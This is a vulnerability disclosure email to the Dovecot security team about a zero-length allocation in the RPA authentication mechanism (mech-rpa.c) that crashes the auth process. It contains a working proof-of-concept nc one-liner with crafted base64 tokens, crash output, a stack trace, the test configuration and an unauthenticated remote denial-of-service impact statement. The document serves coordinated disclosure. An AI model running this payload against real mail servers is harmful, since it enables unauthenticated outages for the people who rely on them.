Hi, Dovecot security team.

I am Orange from DEVCORE security team. We just did a little security audit on the authentication mechanism of Dovecot, and found a buffer over-read in RPA implementation.

In the mech-rpa.c, the function rpa_read_buffer doesn’t check that the length could be zero, and pass the zero into p_malloc(...). It reaches the i_panic due to the safety check, and raises the SIGABRT to exit whole the dovecot/auth process.

PoC:

$ ps -ao pid,cmd | grep dovecot/auth
 25312 dovecot/auth

$ (echo 'AUTH RPA'; echo -ne '\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x01\x00\x04\x00\x00\x01' | base64 -w 0; echo ; echo -ne '\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x00\x03A@A\x00' | base64 -w 0; echo ; echo QUIT) | nc 127.0.0.1 110
+OK Dovecot ready.
+
+ YEkGCWCGSAGG+HMBAQMAIGQRQj/rSuEgBcOqNgYJRgZIbKOIvMFtVmW+dFdYtrc1YWZjNTcxYWQ1ZTNlMTcAC3BvcDNAdWJ1bnR1
-ERR [AUTH] Authentication failed.
+OK Logging out

$ ps -ao pid,cmd | grep dovecot/auth
 25467 dovecot/auth

Stack traces:

Legend: code, data, rodata, value
Stopped reason: SIGABRT
0xf7fc8079 in __kernel_vsyscall ()
gdb-peda$ bt
#0  0xf7fc8079 in __kernel_vsyscall ()
#1  0xf7bcd832 in raise () from /lib/i386-linux-gnu/libc.so.6
#2  0xf7bcecc1 in abort () from /lib/i386-linux-gnu/libc.so.6
#3  0xf7eb7656 in default_fatal_finish (status=0x0, type=LOG_TYPE_PANIC) at failures.c:459
#4  fatal_handler_real (ctx=ctx@entry=0xffb550e4, format=format@entry=0x5666baf7 "Trying to allocate %u bytes",
    args=args@entry=0xffb55114 "") at failures.c:471
#5  0xf7eb77b4 in i_internal_fatal_handler (ctx=0xffb550e4, format=0x5666baf7 "Trying to allocate %u bytes",
    args=0xffb55114 "") at failures.c:848
#6  0xf7df6499 in i_panic (format=0x5666baf7 "Trying to allocate %u bytes") at failures.c:523
#7  0x5664e236 in p_malloc (size=<optimized out>, pool=<optimized out>) at ../../src/lib/mempool.h:105
#8  rpa_read_buffer (buffer=<optimized out>, end=<optimized out>, data=<optimized out>, pool=<optimized out>)
    at mech-rpa.c:230
#9  rpa_parse_token3 (error=0xffb55140, data_size=<optimized out>, data=<optimized out>, request=<optimized out>)
    at mech-rpa.c:283
#10 mech_rpa_auth_phase2 (data_size=<optimized out>, data=<optimized out>, auth_request=<optimized out>)
    at mech-rpa.c:504
#11 mech_rpa_auth_continue (auth_request=<optimized out>, data=<optimized out>, data_size=<optimized out>)
    at mech-rpa.c:543
#12 0x56641a91 in auth_request_handler_auth_continue (handler=<optimized out>, args=<optimized out>)
    at auth-request-handler.c:696
#13 0x56632812 in auth_client_handle_line (line=0x5839b106 "CONT\t1\tYBEGCWCGSAGG+HMBAQADQUBBAA==",
    conn=<optimized out>) at auth-client-connection.c:228
#14 auth_client_input (conn=<optimized out>) at auth-client-connection.c:311
#15 0xf7ed4ddb in io_loop_call_io (io=0x5839d640) at ioloop.c:713
#16 0xf7ed6e5e in io_loop_handler_run_internal (ioloop=0x583879f0) at ioloop-epoll.c:222
#17 0xf7ed4ed2 in io_loop_handler_run (ioloop=0x583879f0) at ioloop.c:765
#18 0xf7ed5139 in io_loop_run (ioloop=0x583879f0) at ioloop.c:738
#19 0xf7e2d0a5 in master_service_run (service=0x58387920, callback=0x566303b0 <client_connected>)
    at master-service.c:809
#20 0x5662ff70 in main (argc=<optimized out>, argv=<optimized out>) at main.c:395
#21 0xf7bb8e81 in __libc_start_main () from /lib/i386-linux-gnu/libc.so.6
#22 0x566301a1 in _start ()

Environment

We have tested this bug on Dovecot-Core 2.3.10, and our configuration is:

# 2.3.10 (): dovecot.conf
# OS: Linux 4.15.0-96-generic x86_64 Ubuntu 18.04.1 LTS
# Hostname: ubuntu
auth_mechanisms = plain login rpa
default_internal_user = orange
default_login_user = orange
namespace inbox {
  inbox = yes
  location =
  mailbox Drafts {
    special_use = \Drafts
  }
  mailbox Junk {
    special_use = \Junk
  }
  mailbox Sent {
    special_use = \Sent
  }
  mailbox "Sent Messages" {
    special_use = \Sent
  }
  mailbox Trash {
    special_use = \Trash
  }
  prefix =
}
passdb {
  driver = shadow
}
userdb {
  driver = passwd
}

Impact

Denied-of-Service. Please note the crash is before the authentication process, it means an attacker can crash the REMOTE Dovecot server without passwords.